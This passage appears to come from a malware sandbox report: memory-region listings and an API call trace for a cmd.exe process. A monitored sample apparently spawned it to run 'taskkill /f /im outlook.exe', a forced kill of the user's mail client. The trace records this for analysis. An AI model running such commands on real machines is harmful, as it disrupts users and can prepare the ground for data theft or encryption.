= 0x4584fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4852 start_va = 0x4590000 end_va = 0x4590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 4853 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 4854 start_va = 0x5e20000 end_va = 0x6156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4855 start_va = 0x45d0000 end_va = 0x46b9fff monitored = 0 entry_point = 0x460d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4856 start_va = 0x46f0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 4857 start_va = 0x45b0000 end_va = 0x45b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 4858 start_va = 0x45d0000 end_va = 0x46affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4859 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4860 start_va = 0x46b0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046b0000" filename = "" Region: id = 4861 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4862 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046c0000" filename = "" Region: id = 4863 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4864 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4865 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4866 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4867 start_va = 0x6160000 end_va = 0x619ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 4868 start_va = 0x61a0000 end_va = 0x61dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 4869 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 4870 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 4871 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 4872 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 4873 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4874 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4876 start_va = 0x46d0000 end_va = 0x46d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Thread: id = 348 os_tid = 0xf88 Thread: id = 349 os_tid = 0xa40 Thread: id = 350 os_tid = 0xb7c Thread: id = 351 os_tid = 0x1058 Thread: id = 352 os_tid = 0xa30 Process: id = "67" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2e660000" os_pid = "0x254" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im outlook.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4880 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4881 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4882 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4883 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4884 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4885 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4886 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4887 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4888 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4889 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4890 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4891 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4892 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4893 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4894 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4895 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4896 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4897 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4898 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4899 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4900 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4901 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4902 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4903 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4904 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4905 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4906 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4907 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4908 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4909 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4910 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4911 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4912 start_va = 0x730000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 4913 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4914 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4915 start_va = 0x860000 end_va = 0xb96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 353 os_tid = 0x62c [0214.260] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0214.261] __set_app_type (_Type=0x1) [0214.261] __p__fmode () returned 0x74974d6c [0214.261] __p__commode () returned 0x74975b1c [0214.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0214.261] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0214.261] GetCurrentThreadId () returned 0x62c [0214.261] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x62c) returned 0x78 [0214.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0214.262] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0214.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.267] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.268] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0214.268] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.268] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0214.269] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0214.269] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.269] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0214.269] GetConsoleOutputCP () returned 0x1b5 [0214.273] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0214.273] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0214.274] _get_osfhandle (_FileHandle=1) returned 0x130 [0214.274] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0214.274] _get_osfhandle (_FileHandle=1) returned 0x130 [0214.274] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0214.274] _get_osfhandle (_FileHandle=0) returned 0x158 [0214.274] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0214.274] GetEnvironmentStringsW () returned 0x477cc0* [0214.274] GetProcessHeap () returned 0x470000 [0214.274] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa1a) returned 0x4786e8 [0214.274] FreeEnvironmentStringsA (penv="A") returned 1 [0214.274] GetProcessHeap () returned 0x470000 [0214.274] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x470550 [0214.274] GetEnvironmentStringsW () returned 0x477cc0* [0214.275] GetProcessHeap () returned 0x470000 [0214.275] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa1a) returned 0x479110 [0214.275] FreeEnvironmentStringsA (penv="A") returned 1 [0214.275] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.275] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0214.275] RegCloseKey (hKey=0x88) returned 0x0 [0214.276] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0214.276] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0214.276] RegCloseKey (hKey=0x88) returned 0x0 [0214.276] time (in: timer=0x0 | out: timer=0x0) returned 0x62344244 [0214.276] srand (_Seed=0x62344244) [0214.276] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im outlook.exe \"" [0214.276] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im outlook.exe \"" [0214.276] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0214.276] GetProcessHeap () returned 0x470000 [0214.276] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x479b38 [0214.277] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x479b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0214.277] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0214.277] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0214.277] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.277] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0214.277] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0214.277] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0214.277] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0214.277] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0214.277] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0214.277] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0214.277] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0214.277] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0214.278] GetProcessHeap () returned 0x470000 [0214.278] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x4786e8) returned 1 [0214.279] GetEnvironmentStringsW () returned 0x477cc0* [0214.279] GetProcessHeap () returned 0x470000 [0214.279] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa32) returned 0x47a790 [0214.279] FreeEnvironmentStringsA (penv="A") returned 1 [0214.279] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0214.279] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.280] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0214.280] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0214.280] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0214.280] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0214.280] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0214.280] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0214.280] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0214.280] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0214.280] GetProcessHeap () returned 0x470000 [0214.280] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x4705c8 [0214.280] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0214.281] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0214.281] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0214.281] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x470618 [0214.282] FindClose (in: hFindFile=0x470618 | out: hFindFile=0x470618) returned 1 [0214.282] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x470618 [0214.282] FindClose (in: hFindFile=0x470618 | out: hFindFile=0x470618) returned 1 [0214.282] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0214.283] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x470618 [0214.283] FindClose (in: hFindFile=0x470618 | out: hFindFile=0x470618) returned 1 [0214.283] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0214.283] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0214.283] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0214.283] GetProcessHeap () returned 0x470000 [0214.284] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a790) returned 1 [0214.284] GetEnvironmentStringsW () returned 0x477cc0* [0214.284] GetProcessHeap () returned 0x470000 [0214.284] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa76) returned 0x479d50 [0214.284] FreeEnvironmentStringsA (penv="=") returned 1 [0214.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d 